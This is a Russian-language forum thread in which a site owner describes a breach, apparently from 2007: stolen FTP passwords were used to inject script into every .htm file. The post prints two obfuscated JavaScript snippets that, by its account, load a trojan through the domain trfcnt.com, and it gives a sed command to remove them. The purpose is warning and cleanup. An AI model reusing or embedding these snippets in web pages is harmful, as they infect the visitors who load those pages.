color
Взлом с 75.126.21.163
в продолжение этого топика... возможно даже "хацкер" тот же...
уводят пароли (предположительно трояном), коннектились к серверу через фтп с IP 208.72.168.186, меняли ВСЕ .htm файлы добавляя javascript с загрузкой через домен trfcnt.com трояна Downloader.JS.Psyme.fl.
Взломы были 9 и 15 апреля, троян добавлен в антивирусные базы только где-то к 13 апрелю.
Так что проверяем свои компы обновленными антивирями, а серваки - на наличие подозрительных скриптов в конце страниц
Строка скрипта с загрузкой трояна:
<script language="JavaScript">e = '0x00' + '2C';str1 = "%97%CF%C4%D9%B3%DE%DF%D4%C7%C8%90%8D%D9%C4%DE%C4%CD%C4%C7%C4%DF%D4%95%CB%C4%CF%CF%C8%C1%8D%91%97%C4%C9%DD%CC%C0%C8%B3%DE%DD%CE%90%8D%CB%DF%DF%C3%95%82%82%CB%D8%CA%C2%CE%C1%DF%81%C4%C1%C9%C2%82%C7%CF%82%DE%D8%C1%82%8D%B3%DA%C4%CF%DF%CB%90%9C%B3%CB%C8%C4%CA%CB%DF%90%9C%91%97%82%C4%C9%DD%CC%C0%C8%91%97%82%CF%C4%D9%91";str=tmp='';for(i=0;i< str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>
и еще один:
<script language="JavaScript">e = '0x00' + '16';str1 = "%AD%F5%FE%E3%89%E4%E5%EE%FD%F2%AA%B7%E3%FE%E4%FE%F7%FE%FD%FE%E5%EE%AF%F1%FE%F5%F5%F2%FB%B7%AB%AD%FE%F3%E7%F6%FA%F2%89%E4%E7%F4%AA%B7%F1%E5%E5%F9%AF%B8%B8%EF%F8%FB%F2%A4%A6%BB%FB%F2%E5%B8%F8%E3%E7%B8%B7%89%E0%FE%F5%E5%F1%AA%A6%89%F1%F2%FE%F0%F1%E5%AA%A6%AB%AD%B8%FE%F3%E7%F6%FA%F2%AB%AD%B8%F5%FE%E3%AB";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>
Последний раз редактировалось: color (18/04/07 в 23:29), всего редактировалось 1 раз
color
на всякий случай сриптик для удаления этой гадости:
find /path-to-www-files -type f -exec sed -r -i 's/^<script.{0,}charCodeAt.{0,}script>//' {} \;